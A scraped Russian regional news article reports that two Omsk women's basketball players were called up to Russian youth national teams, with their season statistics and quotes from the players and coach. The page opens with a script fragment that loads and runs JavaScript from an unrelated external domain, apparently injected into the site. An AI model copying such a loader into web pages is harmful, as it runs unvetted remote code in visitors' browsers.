, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
4 февраля, 2013 Спорт

Омских баскетболисток вызвали в сборные

Омские баскетболистки вызваны в сборные

Дарья Филимонова

Накануне стало известно, что две воспитанницы омского женского баскетбольного клуба «Нефтяник» отправятся в молодежные сборные России. В третий раз подобное приглашения получает защитница Дарья Филимонова, в первый – ее коллега по амплуа Анастасия Матвеева.

Дарья Филимонова вошла в основной состав молодежной сборной России (игроки до 21 года) и примет участие в учебно-тренировочном сборе, который пройдет в Новогорске с 14 по 17 февраля. В нынешнем сезоне воспитанница тренеров Аллы Герасимовой и Елены Лазуткиной приняла участие в 17 матчах Суперлиги, набирая в среднем за игру по 9,4 очка при 3,4 подбора и 1,9 перехвата.

«В состав сборной России меня приглашают уже в третий раз. Сейчас передо мной стоит серьезная задача – попасть в итоговый список игроков, которые летом поедут на чемпионат Европы. Мне очень хочется достойно представлять Омскую область и родной спорткомплекс «Сибирский нефтяник» на международной арене. Надеюсь, у меня все получится!», – прокомментировала это событие сама баскетболистка.

Защитница «Нефтяника-ДЮБЛ» Анастасия Матвеева привлечена в состав юношеской сборной России (игроки до 17 лет) – самой младшей национальной команды. В текущем сезоне Анастасия, являющаяся воспитанницей тренера Елены Лазуткиной, сыграла в 8 матчах Детско-юношеской баскетбольной лиги, набирая в среднем за встречу по 14 очков при 1,8 перехвата.

«Вызов Дарьи Филимоновой и Анастасии Матвеевой в молодежные сборные России имеет очень большое значение как для нашей команды, так и для всего омского баскетбола. Обе девушки имеют все шансы попасть в число участниц чемпионатов Европы по своим возрастам. Многое будет зависеть от того, как они проявят себя на учебно-тренировочных сборах команд», – оценила произошедшее главный тренер «Нефтяника» Елена Лазуткина.

Анастасия Матвеева

Сбор женской юношеской национальной команды России ориентировочно пройдет в марте-апреле, конкретные место и время будут названы позднее.

Кирилл Янчицкий

Фото Владимира Казионова

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Спорт